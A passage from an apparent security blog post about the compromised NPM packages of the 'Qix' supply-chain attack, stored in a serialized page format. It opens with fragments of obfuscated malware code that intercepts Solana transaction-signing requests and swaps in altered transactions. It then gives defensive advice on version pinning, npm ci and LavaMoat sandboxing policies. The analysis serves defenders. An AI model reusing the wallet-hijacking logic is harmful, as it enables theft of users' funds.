_0x1089ae",{"type":28,"tag":116,"props":97958,"children":97959},{"style":266},[97960],{"type":33,"value":313},{"type":28,"tag":116,"props":97962,"children":97963},{"style":272},[97964],{"type":33,"value":97861},{"type":28,"tag":116,"props":97966,"children":97967},{"style":266},[97968],{"type":33,"value":141},{"type":28,"tag":116,"props":97970,"children":97971},{"style":272},[97972],{"type":33,"value":97896},{"type":28,"tag":116,"props":97974,"children":97975},{"style":266},[97976],{"type":33,"value":347},{"type":28,"tag":116,"props":97978,"children":97979},{"style":350},[97980],{"type":33,"value":353},{"type":28,"tag":116,"props":97982,"children":97983},{"style":266},[97984],{"type":33,"value":22723},{"type":28,"tag":116,"props":97986,"children":97987},{"style":376},[97988],{"type":33,"value":3664},{"type":28,"tag":116,"props":97990,"children":97991},{"style":266},[97992],{"type":33,"value":895},{"type":28,"tag":116,"props":97994,"children":97995},{"class":245,"line":361},[97996,98001,98005,98009,98013,98017,98021,98025,98029],{"type":28,"tag":116,"props":97997,"children":97998},{"style":272},[97999],{"type":33,"value":98000},"    _0x2c3d7e",{"type":28,"tag":116,"props":98002,"children":98003},{"style":266},[98004],{"type":33,"value":141},{"type":28,"tag":116,"props":98006,"children":98007},{"style":272},[98008],{"type":33,"value":97896},{"type":28,"tag":116,"props":98010,"children":98011},{"style":266},[98012],{"type":33,"value":347},{"type":28,"tag":116,"props":98014,"children":98015},{"style":350},[98016],{"type":33,"value":353},{"type":28,"tag":116,"props":98018,"children":98019},{"style":266},[98020],{"type":33,"value":8333},{"type":28,"tag":116,"props":98022,"children":98023},{"style":370},[98024],{"type":33,"value":373},{"type":28,"tag":116,"props":98026,"children":98027},{"style":272},[98028],{"type":33,"value":97947},{"type":28,"tag":116,"props":98030,"children":98031},{"style":266},[98032],{"type":33,"value":384},{"type":28,"tag":116,"props":98034,"children":98035},{"class":245,"line":387},[98036,98040,98044,98048,98053],{"type":28,"tag":116,"props":98037,"children":98038},{"style":266},[98039],{"type":33,"value":31119},{"type":28,"tag":116,"props":98041,"children":98042},{"style":260},[98043],{"type":33,"value":48033},{"type":28,"tag":116,"props":98045,"children":98046},{"style":266},[98047],{"type":33,"value":269},{"type":28,"tag":116,"props":98049,"children":98050},{"style":272},[98051],{"type":33,"value":98052},"_0x226343",{"type":28,"tag":116,"props":98054,"children":98055},{"style":266},[98056],{"type":33,"value":98057},") {}\n",{"type":28,"tag":116,"props":98059,"children":98060},{"class":245,"line":400},[98061,98065,98069],{"type":28,"tag":116,"props":98062,"children":98063},{"style":266},[98064],{"type":33,"value":46499},{"type":28,"tag":116,"props":98066,"children":98067},{"style":260},[98068],{"type":33,"value":2986},{"type":28,"tag":116,"props":98070,"children":98071},{"style":266},[98072],{"type":33,"value":1291},{"type":28,"tag":116,"props":98074,"children":98075},{"class":245,"line":614},[98076,98080],{"type":28,"tag":116,"props":98077,"children":98078},{"style":260},[98079],{"type":33,"value":31045},{"type":28,"tag":116,"props":98081,"children":98082},{"style":266},[98083],{"type":33,"value":78186},{"type":28,"tag":116,"props":98085,"children":98086},{"class":245,"line":631},[98087,98092,98096,98100,98104,98108,98113],{"type":28,"tag":116,"props":98088,"children":98089},{"style":266},[98090],{"type":33,"value":98091},"    (",{"type":28,"tag":116,"props":98093,"children":98094},{"style":272},[98095],{"type":33,"value":97861},{"type":28,"tag":116,"props":98097,"children":98098},{"style":266},[98099],{"type":33,"value":141},{"type":28,"tag":116,"props":98101,"children":98102},{"style":272},[98103],{"type":33,"value":37935},{"type":28,"tag":116,"props":98105,"children":98106},{"style":370},[98107],{"type":33,"value":31073},{"type":28,"tag":116,"props":98109,"children":98110},{"style":563},[98111],{"type":33,"value":98112}," 'solana_signTransaction'",{"type":28,"tag":116,"props":98114,"children":98115},{"style":370},[98116],{"type":33,"value":98117}," ||\n",{"type":28,"tag":116,"props":98119,"children":98120},{"class":245,"line":665},[98121,98126,98130,98134,98138,98143,98147],{"type":28,"tag":116,"props":98122,"children":98123},{"style":272},[98124],{"type":33,"value":98125},"      _0x2c3d7e",{"type":28,"tag":116,"props":98127,"children":98128},{"style":266},[98129],{"type":33,"value":141},{"type":28,"tag":116,"props":98131,"children":98132},{"style":272},[98133],{"type":33,"value":37935},{"type":28,"tag":116,"props":98135,"children":98136},{"style":370},[98137],{"type":33,"value":31073},{"type":28,"tag":116,"props":98139,"children":98140},{"style":563},[98141],{"type":33,"value":98142}," 'solana_signAndSendTransaction'",{"type":28,"tag":116,"props":98144,"children":98145},{"style":266},[98146],{"type":33,"value":1609},{"type":28,"tag":116,"props":98148,"children":98149},{"style":370},[98150],{"type":33,"value":83433},{"type":28,"tag":116,"props":98152,"children":98153},{"class":245,"line":713},[98154,98158,98162,98166],{"type":28,"tag":116,"props":98155,"children":98156},{"style":272},[98157],{"type":33,"value":98000},{"type":28,"tag":116,"props":98159,"children":98160},{"style":266},[98161],{"type":33,"value":141},{"type":28,"tag":116,"props":98163,"children":98164},{"style":272},[98165],{"type":33,"value":97896},{"type":28,"tag":116,"props":98167,"children":98168},{"style":370},[98169],{"type":33,"value":52302},{"type":28,"tag":116,"props":98171,"children":98172},{"class":245,"line":750},[98173,98177,98181,98185,98189,98193],{"type":28,"tag":116,"props":98174,"children":98175},{"style":272},[98176],{"type":33,"value":98000},{"type":28,"tag":116,"props":98178,"children":98179},{"style":266},[98180],{"type":33,"value":141},{"type":28,"tag":116,"props":98182,"children":98183},{"style":272},[98184],{"type":33,"value":97896},{"type":28,"tag":116,"props":98186,"children":98187},{"style":266},[98188],{"type":33,"value":347},{"type":28,"tag":116,"props":98190,"children":98191},{"style":350},[98192],{"type":33,"value":353},{"type":28,"tag":116,"props":98194,"children":98195},{"style":266},[98196],{"type":33,"value":11440},{"type":28,"tag":116,"props":98198,"children":98199},{"class":245,"line":779},[98200],{"type":28,"tag":116,"props":98201,"children":98202},{"style":266},[98203],{"type":33,"value":98204},"  ) {\n",{"type":28,"tag":116,"props":98206,"children":98207},{"class":245,"line":796},[98208,98212],{"type":28,"tag":116,"props":98209,"children":98210},{"style":260},[98211],{"type":33,"value":69603},{"type":28,"tag":116,"props":98213,"children":98214},{"style":266},[98215],{"type":33,"value":1291},{"type":28,"tag":116,"props":98217,"children":98218},{"class":245,"line":847},[98219,98223,98228,98232,98236,98240,98244,98248,98252],{"type":28,"tag":116,"props":98220,"children":98221},{"style":376},[98222],{"type":33,"value":7747},{"type":28,"tag":116,"props":98224,"children":98225},{"style":272},[98226],{"type":33,"value":98227}," _0x5ad975",{"type":28,"tag":116,"props":98229,"children":98230},{"style":370},[98231],{"type":33,"value":2226},{"type":28,"tag":116,"props":98233,"children":98234},{"style":272},[98235],{"type":33,"value":97887},{"type":28,"tag":116,"props":98237,"children":98238},{"style":266},[98239],{"type":33,"value":141},{"type":28,"tag":116,"props":98241,"children":98242},{"style":272},[98243],{"type":33,"value":97896},{"type":28,"tag":116,"props":98245,"children":98246},{"style":266},[98247],{"type":33,"value":347},{"type":28,"tag":116,"props":98249,"children":98250},{"style":350},[98251],{"type":33,"value":353},{"type":28,"tag":116,"props":98253,"children":98254},{"style":266},[98255],{"type":33,"value":31223},{"type":28,"tag":116,"props":98257,"children":98258},{"class":245,"line":898},[98259,98263,98267,98272,98276,98281],{"type":28,"tag":116,"props":98260,"children":98261},{"style":260},[98262],{"type":33,"value":2186},{"type":28,"tag":116,"props":98264,"children":98265},{"style":266},[98266],{"type":33,"value":269},{"type":28,"tag":116,"props":98268,"children":98269},{"style":272},[98270],{"type":33,"value":98271},"_0x5ad975",{"type":28,"tag":116,"props":98273,"children":98274},{"style":266},[98275],{"type":33,"value":141},{"type":28,"tag":116,"props":98277,"children":98278},{"style":272},[98279],{"type":33,"value":98280},"transaction",{"type":28,"tag":116,"props":98282,"children":98283},{"style":266},[98284],{"type":33,"value":844},{"type":28,"tag":116,"props":98286,"children":98287},{"class":245,"line":907},[98288,98293,98297,98301,98305,98309],{"type":28,"tag":116,"props":98289,"children":98290},{"style":272},[98291],{"type":33,"value":98292},"        _0x5ad975",{"type":28,"tag":116,"props":98294,"children":98295},{"style":370},[98296],{"type":33,"value":2226},{"type":28,"tag":116,"props":98298,"children":98299},{"style":272},[98300],{"type":33,"value":98227},{"type":28,"tag":116,"props":98302,"children":98303},{"style":266},[98304],{"type":33,"value":141},{"type":28,"tag":116,"props":98306,"children":98307},{"style":272},[98308],{"type":33,"value":98280},{"type":28,"tag":116,"props":98310,"children":98311},{"style":266},[98312],{"type":33,"value":384},{"type":28,"tag":116,"props":98314,"children":98315},{"class":245,"line":981},[98316],{"type":28,"tag":116,"props":98317,"children":98318},{"style":266},[98319],{"type":33,"value":2444},{"type":28,"tag":116,"props":98321,"children":98322},{"class":245,"line":1011},[98323,98327,98332,98336,98340,98344,98348,98352,98356],{"type":28,"tag":116,"props":98324,"children":98325},{"style":376},[98326],{"type":33,"value":31196},{"type":28,"tag":116,"props":98328,"children":98329},{"style":272},[98330],{"type":33,"value":98331}," _0x5dbe63",{"type":28,"tag":116,"props":98333,"children":98334},{"style":370},[98335],{"type":33,"value":2226},{"type":28,"tag":116,"props":98337,"children":98338},{"style":282},[98339],{"type":33,"value":97956},{"type":28,"tag":116,"props":98341,"children":98342},{"style":266},[98343],{"type":33,"value":313},{"type":28,"tag":116,"props":98345,"children":98346},{"style":272},[98347],{"type":33,"value":98271},{"type":28,"tag":116,"props":98349,"children":98350},{"style":266},[98351],{"type":33,"value":825},{"type":28,"tag":116,"props":98353,"children":98354},{"style":376},[98355],{"type":33,"value":7847},{"type":28,"tag":116,"props":98357,"children":98358},{"style":266},[98359],{"type":33,"value":895},{"type":28,"tag":116,"props":98361,"children":98362},{"class":245,"line":1029},[98363,98367,98371,98375,98379,98383,98387,98391,98395,98399],{"type":28,"tag":116,"props":98364,"children":98365},{"style":260},[98366],{"type":33,"value":2186},{"type":28,"tag":116,"props":98368,"children":98369},{"style":266},[98370],{"type":33,"value":269},{"type":28,"tag":116,"props":98372,"children":98373},{"style":272},[98374],{"type":33,"value":97861},{"type":28,"tag":116,"props":98376,"children":98377},{"style":266},[98378],{"type":33,"value":141},{"type":28,"tag":116,"props":98380,"children":98381},{"style":272},[98382],{"type":33,"value":97896},{"type":28,"tag":116,"props":98384,"children":98385},{"style":266},[98386],{"type":33,"value":347},{"type":28,"tag":116,"props":98388,"children":98389},{"style":350},[98390],{"type":33,"value":353},{"type":28,"tag":116,"props":98392,"children":98393},{"style":266},[98394],{"type":33,"value":49968},{"type":28,"tag":116,"props":98396,"children":98397},{"style":272},[98398],{"type":33,"value":98280},{"type":28,"tag":116,"props":98400,"children":98401},{"style":266},[98402],{"type":33,"value":844},{"type":28,"tag":116,"props":98404,"children":98405},{"class":245,"line":1038},[98406,98411,98415,98419,98423,98427,98431,98435,98439,98443],{"type":28,"tag":116,"props":98407,"children":98408},{"style":272},[98409],{"type":33,"value":98410},"        _0x2c3d7e",{"type":28,"tag":116,"props":98412,"children":98413},{"style":266},[98414],{"type":33,"value":141},{"type":28,"tag":116,"props":98416,"children":98417},{"style":272},[98418],{"type":33,"value":97896},{"type":28,"tag":116,"props":98420,"children":98421},{"style":266},[98422],{"type":33,"value":347},{"type":28,"tag":116,"props":98424,"children":98425},{"style":350},[98426],{"type":33,"value":353},{"type":28,"tag":116,"props":98428,"children":98429},{"style":266},[98430],{"type":33,"value":49968},{"type":28,"tag":116,"props":98432,"children":98433},{"style":272},[98434],{"type":33,"value":98280},{"type":28,"tag":116,"props":98436,"children":98437},{"style":370},[98438],{"type":33,"value":2226},{"type":28,"tag":116,"props":98440,"children":98441},{"style":272},[98442],{"type":33,"value":98331},{"type":28,"tag":116,"props":98444,"children":98445},{"style":266},[98446],{"type":33,"value":384},{"type":28,"tag":116,"props":98448,"children":98449},{"class":245,"line":1047},[98450,98454,98458],{"type":28,"tag":116,"props":98451,"children":98452},{"style":266},[98453],{"type":33,"value":38561},{"type":28,"tag":116,"props":98455,"children":98456},{"style":260},[98457],{"type":33,"value":2986},{"type":28,"tag":116,"props":98459,"children":98460},{"style":266},[98461],{"type":33,"value":1291},{"type":28,"tag":116,"props":98463,"children":98464},{"class":245,"line":1071},[98465,98469,98473,98477,98481,98485,98489,98493,98497],{"type":28,"tag":116,"props":98466,"children":98467},{"style":272},[98468],{"type":33,"value":98410},{"type":28,"tag":116,"props":98470,"children":98471},{"style":266},[98472],{"type":33,"value":141},{"type":28,"tag":116,"props":98474,"children":98475},{"style":272},[98476],{"type":33,"value":97896},{"type":28,"tag":116,"props":98478,"children":98479},{"style":266},[98480],{"type":33,"value":347},{"type":28,"tag":116,"props":98482,"children":98483},{"style":350},[98484],{"type":33,"value":353},{"type":28,"tag":116,"props":98486,"children":98487},{"style":266},[98488],{"type":33,"value":8333},{"type":28,"tag":116,"props":98490,"children":98491},{"style":370},[98492],{"type":33,"value":373},{"type":28,"tag":116,"props":98494,"children":98495},{"style":272},[98496],{"type":33,"value":98331},{"type":28,"tag":116,"props":98498,"children":98499},{"style":266},[98500],{"type":33,"value":384},{"type":28,"tag":116,"props":98502,"children":98503},{"class":245,"line":1137},[98504],{"type":28,"tag":116,"props":98505,"children":98506},{"style":266},[98507],{"type":33,"value":2444},{"type":28,"tag":116,"props":98509,"children":98510},{"class":245,"line":1181},[98511,98515,98519,98523,98528],{"type":28,"tag":116,"props":98512,"children":98513},{"style":266},[98514],{"type":33,"value":15440},{"type":28,"tag":116,"props":98516,"children":98517},{"style":260},[98518],{"type":33,"value":48033},{"type":28,"tag":116,"props":98520,"children":98521},{"style":266},[98522],{"type":33,"value":269},{"type":28,"tag":116,"props":98524,"children":98525},{"style":272},[98526],{"type":33,"value":98527},"_0x4b99fd",{"type":28,"tag":116,"props":98529,"children":98530},{"style":266},[98531],{"type":33,"value":98057},{"type":28,"tag":116,"props":98533,"children":98534},{"class":245,"line":1212},[98535],{"type":28,"tag":116,"props":98536,"children":98537},{"style":266},[98538],{"type":33,"value":5543},{"type":28,"tag":116,"props":98540,"children":98541},{"class":245,"line":1254},[98542],{"type":28,"tag":116,"props":98543,"children":98544},{"style":266},[98545],{"type":33,"value":406},{"type":28,"tag":75,"props":98547,"children":98549},{"id":98548},"impact-of-the-attack",[98550],{"type":33,"value":98551},"Impact of the Attack",{"type":28,"tag":29,"props":98553,"children":98554},{},[98555],{"type":33,"value":98556},"Despite the attack targeting popular NPM packages, the exploit was not very successful. After two days, the attacker's wallet was only able to drain about $1000. However, the takeaway is how easily a trusted dependency can become a delivery vector for malware.",{"type":28,"tag":63,"props":98558,"children":98560},{"id":98559},"why-it-will-happen-again",[98561],{"type":33,"value":98562},"Why It Will Happen Again",{"type":28,"tag":29,"props":98564,"children":98565},{},[98566],{"type":33,"value":98567},"The decentralized nature of the open-source ecosystem, and particularly a massive registry like NPM, makes it an attractive and persistent target for attackers. Although this recent attack was quickly mitigated and financially minor, it served as a powerful and widely-publicized proof-of-concept showing how one compromised maintainer can distribute malware at scale.",{"type":28,"tag":29,"props":98569,"children":98570},{},[98571],{"type":33,"value":98572},"With over two million packages and countless layers of direct and transitive dependencies, a compromise can cascade through thousands of projects in hours. It's the classic \"needle in a haystack\" problem, except the haystack keeps growing.",{"type":28,"tag":63,"props":98574,"children":98576},{"id":98575},"what-developers-can-do",[98577],{"type":33,"value":98578},"What Developers Can Do",{"type":28,"tag":29,"props":98580,"children":98581},{},[98582],{"type":33,"value":98583},"If you are building critical systems where supply-chain attacks are an unacceptable risk in your threat model, here are some practical actions you can take:",{"type":28,"tag":75,"props":98585,"children":98587},{"id":98586},"_1-version-pinning-in-packagejson",[98588,98590],{"type":33,"value":98589},"1. Version pinning in ",{"type":28,"tag":98,"props":98591,"children":98593},{"className":98592},[],[98594],{"type":33,"value":98595},"package.json",{"type":28,"tag":29,"props":98597,"children":98598},{},[98599],{"type":33,"value":98600},"Applications get compromised by supply-chain attacks when an attacker releases a new version of an NPM package and the application automatically downloads it to have the latest package version.",{"type":28,"tag":29,"props":98602,"children":98603},{},[98604,98606,98612,98614,98619,98621,98626],{"type":33,"value":98605},"You can pin your dependency versions to make sure they won't get updated when running ",{"type":28,"tag":98,"props":98607,"children":98609},{"className":98608},[],[98610],{"type":33,"value":98611},"npm install",{"type":33,"value":98613},". To pin it, just make sure to remove the caret ",{"type":28,"tag":98,"props":98615,"children":98617},{"className":98616},[],[98618],{"type":33,"value":48555},{"type":33,"value":98620}," symbol before the version in ",{"type":28,"tag":98,"props":98622,"children":98624},{"className":98623},[],[98625],{"type":33,"value":98595},{"type":33,"value":4160},{"type":28,"tag":234,"props":98628,"children":98630},{"code":98629,"language":33632,"meta":7,"className":33630,"style":7},"\"@react-native-async-storage/async-storage\": \"1.23.1\",\n\"@react-native-community/datetimepicker\": \"8.3.0\",\n\"@react-native-community/netinfo\": \"11.4.1\",\n\"@react-native-picker/picker\": \"2.11.0\"\n",[98631],{"type":28,"tag":98,"props":98632,"children":98633},{"__ignoreMap":7},[98634,98655,98676,98697],{"type":28,"tag":116,"props":98635,"children":98636},{"class":245,"line":246},[98637,98642,98646,98651],{"type":28,"tag":116,"props":98638,"children":98639},{"style":563},[98640],{"type":33,"value":98641},"\"@react-native-async-storage/async-storage\"",{"type":28,"tag":116,"props":98643,"children":98644},{"style":266},[98645],{"type":33,"value":14994},{"type":28,"tag":116,"props":98647,"children":98648},{"style":563},[98649],{"type":33,"value":98650},"\"1.23.1\"",{"type":28,"tag":116,"props":98652,"children":98653},{"style":266},[98654],{"type":33,"value":3178},{"type":28,"tag":116,"props":98656,"children":98657},{"class":245,"line":256},[98658,98663,98667,98672],{"type":28,"tag":116,"props":98659,"children":98660},{"style":563},[98661],{"type":33,"value":98662},"\"@react-native-community/datetimepicker\"",{"type":28,"tag":116,"props":98664,"children":98665},{"style":266},[98666],{"type":33,"value":14994},{"type":28,"tag":116,"props":98668,"children":98669},{"style":563},[98670],{"type":33,"value":98671},"\"8.3.0\"",{"type":28,"tag":116,"props":98673,"children":98674},{"style":266},[98675],{"type":33,"value":3178},{"type":28,"tag":116,"props":98677,"children":98678},{"class":245,"line":293},[98679,98684,98688,98693],{"type":28,"tag":116,"props":98680,"children":98681},{"style":563},[98682],{"type":33,"value":98683},"\"@react-native-community/netinfo\"",{"type":28,"tag":116,"props":98685,"children":98686},{"style":266},[98687],{"type":33,"value":14994},{"type":28,"tag":116,"props":98689,"children":98690},{"style":563},[98691],{"type":33,"value":98692},"\"11.4.1\"",{"type":28,"tag":116,"props":98694,"children":98695},{"style":266},[98696],{"type":33,"value":3178},{"type":28,"tag":116,"props":98698,"children":98699},{"class":245,"line":361},[98700,98705,98709],{"type":28,"tag":116,"props":98701,"children":98702},{"style":563},[98703],{"type":33,"value":98704},"\"@react-native-picker/picker\"",{"type":28,"tag":116,"props":98706,"children":98707},{"style":266},[98708],{"type":33,"value":14994},{"type":28,"tag":116,"props":98710,"children":98711},{"style":563},[98712],{"type":33,"value":98713},"\"2.11.0\"\n",{"type":28,"tag":75,"props":98715,"children":98717},{"id":98716},"_2-use-npm-ci",[98718,98720],{"type":33,"value":98719},"2. Use ",{"type":28,"tag":98,"props":98721,"children":98723},{"className":98722},[],[98724],{"type":33,"value":98725},"npm ci",{"type":28,"tag":29,"props":98727,"children":98728},{},[98729,98734,98736,98742,98744,98749],{"type":28,"tag":98,"props":98730,"children":98732},{"className":98731},[],[98733],{"type":33,"value":98725},{"type":33,"value":98735}," uses the dependency versions from ",{"type":28,"tag":98,"props":98737,"children":98739},{"className":98738},[],[98740],{"type":33,"value":98741},"package-lock.json",{"type":33,"value":98743}," to install the packages. Consider using it in CI/CD workflows and only use ",{"type":28,"tag":98,"props":98745,"children":98747},{"className":98746},[],[98748],{"type":33,"value":98611},{"type":33,"value":98750}," when adding a new package or updating an existing one.",{"type":28,"tag":75,"props":98752,"children":98754},{"id":98753},"_3-implement-lavamoat",[98755,98757],{"type":33,"value":98756},"3. Implement ",{"type":28,"tag":87,"props":98758,"children":98761},{"href":98759,"rel":98760},"https://github.com/LavaMoat/LavaMoat/tree/main",[91],[98762],{"type":28,"tag":4995,"props":98763,"children":98764},{},[98765],{"type":33,"value":98766},"Lavamoat",{"type":28,"tag":29,"props":98768,"children":98769},{},[98770],{"type":33,"value":98771},"Basic hygiene helps, but it doesn’t solve the root issue: a minor utility package has the same permissions as your code. Lavamoat changes this model. Lavamoat, created by MetaMask, addresses this by sandboxing packages and enforcing least privilege. With it, even if a dependency contains malware, it cannot compromise the application.",{"type":28,"tag":29,"props":98773,"children":98774},{},[98775],{"type":33,"value":98776},"Lavamoat uses SES (Hardened JavaScript) to enforce these restrictions, limiting the globals, functions, and sub-dependencies each package can access. The rules are defined in a policy file, which looks like this:",{"type":28,"tag":234,"props":98778,"children":98780},{"code":98779,"language":33632,"meta":7,"className":33630,"style":7},"\"resources\": {\n    \"@ethereumjs/util>@ethereumjs/rlp\": {\n      \"globals\": {\n        \"TextEncoder\": true\n      }\n    },\n    \"@ethereumjs/util\": {\n      \"globals\": {\n        \"console.warn\": true,\n        \"fetch\": true\n      },\n      \"packages\": {\n        \"@ethereumjs/util>@ethereumjs/rlp\": true,\n        \"@ethereumjs/util>ethereum-cryptography\": true\n      }\n    }\n}\n",[98781],{"type":28,"tag":98,"props":98782,"children":98783},{"__ignoreMap":7},[98784,98796,98808,98819,98835,98842,98849,98861,98872,98892,98908,98915,98926,98946,98962,98969,98976],{"type":28,"tag":116,"props":98785,"children":98786},{"class":245,"line":246},[98787,98792],{"type":28,"tag":116,"props":98788,"children":98789},{"style":563},[98790],{"type":33,"value":98791},"\"resources\"",{"type":28,"tag":116,"props":98793,"children":98794},{"style":266},[98795],{"type":33,"value":36646},{"type":28,"tag":116,"props":98797,"children":98798},{"class":245,"line":256},[98799,98804],{"type":28,"tag":116,"props":98800,"children":98801},{"style":272},[98802],{"type":33,"value":98803},"    \"@ethereumjs/util>@ethereumjs/rlp\"",{"type":28,"tag":116,"props":98805,"children":98806},{"style":266},[98807],{"type":33,"value":36646},{"type":28,"tag":116,"props":98809,"children":98810},{"class":245,"line":293},[98811,98815],{"type":28,"tag":116,"props":98812,"children":98813},{"style":272},[98814],{"type":33,"value":36654},{"type":28,"tag":116,"props":98816,"children":98817},{"style":266},[98818],{"type":33,"value":36646},{"type":28,"tag":116,"props":98820,"children":98821},{"class":245,"line":361},[98822,98827,98831],{"type":28,"tag":116,"props":98823,"children":98824},{"style":272},[98825],{"type":33,"value":98826},"        \"TextEncoder\"",{"type":28,"tag":116,"props":98828,"children":98829},{"style":266},[98830],{"type":33,"value":14994},{"type":28,"tag":116,"props":98832,"children":98833},{"style":376},[98834],{"type":33,"value":36815},{"type":28,"tag":116,"props":98836,"children":98837},{"class":245,"line":387},[98838],{"type":28,"tag":116,"props":98839,"children":98840},{"style":266},[98841],{"type":33,"value":2444},{"type":28,"tag":116,"props":98843,"children":98844},{"class":245,"line":400},[98845],{"type":28,"tag":116,"props":98846,"children":98847},{"style":266},[98848],{"type":33,"value":25036},{"type":28,"tag":116,"props":98850,"children":98851},{"class":245,"line":614},[98852,98857],{"type":28,"tag":116,"props":98853,"children":98854},{"style":272},[98855],{"type":33,"value":98856},"    \"@ethereumjs/util\"",{"type":28,"tag":116,"props":98858,"children":98859},{"style":266},[98860],{"type":33,"value":36646},{"type":28,"tag":116,"props":98862,"children":98863},{"class":245,"line":631},[98864,98868],{"type":28,"tag":116,"props":98865,"children":98866},{"style":272},[98867],{"type":33,"value":36654},{"type":28,"tag":116,"props":98869,"children":98870},{"style":266},[98871],{"type":33,"value":36646},{"type":28,"tag":116,"props":98873,"children":98874},{"class":245,"line":665},[98875,98880,98884,98888],{"type":28,"tag":116,"props":98876,"children":98877},{"style":272},[98878],{"type":33,"value":98879},"        \"console.warn\"",{"type":28,"tag":116,"props":98881,"children":98882},{"style":266},[98883],{"type":33,"value":14994},{"type":28,"tag":116,"props":98885,"children":98886},{"style":376},[98887],{"type":33,"value":3664},{"type":28,"tag":116,"props":98889,"children":98890},{"style":266},[98891],{"type":33,"value":3178},{"type":28,"tag":116,"props":98893,"children":98894},{"class":245,"line":713},[98895,98900,98904],{"type":28,"tag":116,"props":98896,"children":98897},{"style":272},[98898],{"type":33,"value":98899},"        \"fetch\"",{"type":28,"tag":116,"props":98901,"children":98902},{"style":266},[98903],{"type":33,"value":14994},{"type":28,"tag":116,"props":98905,"children":98906},{"style":376},[98907],{"type":33,"value":36815},{"type":28,"tag":116,"props":98909,"children":98910},{"class":245,"line":750},[98911],{"type":28,"tag":116,"props":98912,"children":98913},{"style":266},[98914],{"type":33,"value":36823},{"type":28,"tag":116,"props":98916,"children":98917},{"class":245,"line":779},[98918,98922],{"type":28,"tag":116,"props":98919,"children":98920},{"style":272},[98921],{"type":33,"value":36831},{"type":28,"tag":116,"props":98923,"children":98924},{"style":266},[98925],{"type":33,"value":36646},{"type":28,"tag":116,"props":98927,"children":98928},{"class":245,"line":796},[98929,98934,98938,98942],{"type":28,"tag":116,"props":98930,"children":98931},{"style":272},[98932],{"type":33,"value":98933},"        \"@ethereumjs/util>@ethereumjs/rlp\"",{"type":28,"tag":116,"props":98935,"children":98936},{"style":266},[98937],{"type":33,"value":14994},{"type":28,"tag":116,"props":98939,"children":98940},{"style":376},[98941],{"type":33,"value":3664},{"type":28,"tag":116,"props":98943,"children":98944},{"style":266},[98945],{"type":33,"value":3178},{"type":28,"tag":116,"props":98947,"children":98948},{"class":245,"line":847},[98949,98954,98958],{"type":28,"tag":116,"props":98950,"children":98951},{"style":272},[98952],{"type":33,"value":98953},"        \"@ethereumjs/util>ethereum-cryptography\"",{"type":28,"tag":116,"props":98955,"children":98956},{"style":266},[98957],{"type":33,"value":14994},{"type":28,"tag":116,"props":98959,"children":98960},{"style":376},[98961],{"type":33,"value":36815},{"type":28,"tag":116,"props":98963,"children":98964},{"class":245,"line":898},[98965],{"type":28,"tag":116,"props":98966,"children":98967},{"style":266},[98968],{"type":33,"value":2444},{"type":28,"tag":116,"props":98970,"children":98971},{"class":245,"line":907},[98972],{"type":28,"tag":116,"props":98973,"children":98974},{"style":266},[98975],{"type":33,"value":3025},{"type":28,"tag":116,"props":98977,"children":98978},{"class":245,"line":981},[98979],{"type":28,"tag":116,"props":98980,"children":98981},{"style":266},[98982],{"type":33,"value":406},{"type":28,"tag":29,"props":98984,"children":98985},{},[98986,98988,98994,98996,99002,99003,99008,99010,99016,99017,99023],{"type":33,"value":98987},"In this example, it restricts the ",{"type":28,"tag":98,"props":98989,"children":98991},{"className":98990},[],[98992],{"type":33,"value":98993},"@ethereumjs/util",{"type":33,"value":98995}," package to use only ",{"type":28,"tag":98,"props":98997,"children":98999},{"className":98998},[],[99000],{"type":33,"value":99001},"console.warn",{"type":33,"value":10659},{"type":28,"tag":98,"props":99004,"children":99006},{"className":99005},[],[99007],{"type":33,"value":33729},{"type":33,"value":99009}," functions, and to include only ",{"type":28,"tag":98,"props":99011,"children":99013},{"className":99012},[],[99014],{"type":33,"value":99015},"@ethereumjs/rlp",{"type":33,"value":10659},{"type":28,"tag":98,"props":99018,"children":99020},{"className":99019},[],[99021],{"type":33,"value":99022},"ethereum-cryptography",{"type":33,"value":99024}," packages.",{"type":28,"tag":29,"props":99026,"children":99027},{},[99028],{"type":33,"value":99029},"The policy files can be generated automatically and should be regenerated carefully, because if you generate a policy while a malicious package is installed, Lavamoat’s protection can be bypassed.",{"type":28,"tag":29,"props":99031,"children":99032},{},[99033,99035,99041],{"type":33,"value":99034},"Lavamoat also automatically freezes the global objects to prevent them being replaced or tampered with. See ",{"type":28,"tag":87,"props":99036,"children":99039},{"href":99037,"rel":99038},"https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Object/freeze",[91],[99040],{"type":33,"value":37001},{"type":33,"value":141},{"type":28,"tag":75,"props":99043,"children":99045},{"id":99044},"lavamoat-vs-qix-malware",[99046],{"type":33,"value":99047},"Lavamoat vs Qix Malware",{"type":28,"tag":29,"props":99049,"children":99050},{},[99051,99053,99058],{"type":33,"value":99052},"If a dApp were compromised with the Qix malware (say it used ",{"type":28,"tag":98,"props":99054,"children":99056},{"className":99055},[],[99057],{"type":33,"value":96899},{"type":33,"value":99059},"), it would need to perform the following actions to drain funds from a wallet:",{"type":28,"tag":455,"props":99061,"children":99062},{},[99063,99075,99086,99097],{"type":28,"tag":459,"props":99064,"children":99065},{},[99066,99068,99073],{"type":33,"value":99067},"Replace ",{"type":28,"tag":98,"props":99069,"children":99071},{"className":99070},[],[99072],{"type":33,"value":33729},{"type":33,"value":99074}," function to a custom one",{"type":28,"tag":459,"props":99076,"children":99077},{},[99078,99080],{"type":33,"value":99079},"Access ",{"type":28,"tag":98,"props":99081,"children":99083},{"className":99082},[],[99084],{"type":33,"value":99085},"window.ethereum",{"type":28,"tag":459,"props":99087,"children":99088},{},[99089,99091,99096],{"type":33,"value":99090},"Call original ",{"type":28,"tag":98,"props":99092,"children":99094},{"className":99093},[],[99095],{"type":33,"value":33729},{"type":33,"value":1058},{"type":28,"tag":459,"props":99098,"children":99099},{},[99100],{"type":33,"value":99101},"Plus other actions not relevant here",{"type":28,"tag":29,"props":99103,"children":99104},{},[99105,99107,99113],{"type":33,"value":99106},"If the dApp is using Lavamoat with a generated policy for ",{"type":28,"tag":98,"props":99108,"children":99110},{"className":99109},[],[99111],{"type":33,"value":99112},"chalk 5.6.0",{"type":33,"value":99114}," (non-malicious version) it would look like this:",{"type":28,"tag":234,"props":99116,"children":99118},{"code":99117,"language":33632,"meta":7,"className":33630,"style":7},"\"chalk\": {\n      \"globals\": {\n        \"navigator.userAgent\": true,\n        \"navigator.userAgentData\": true\n      }\n    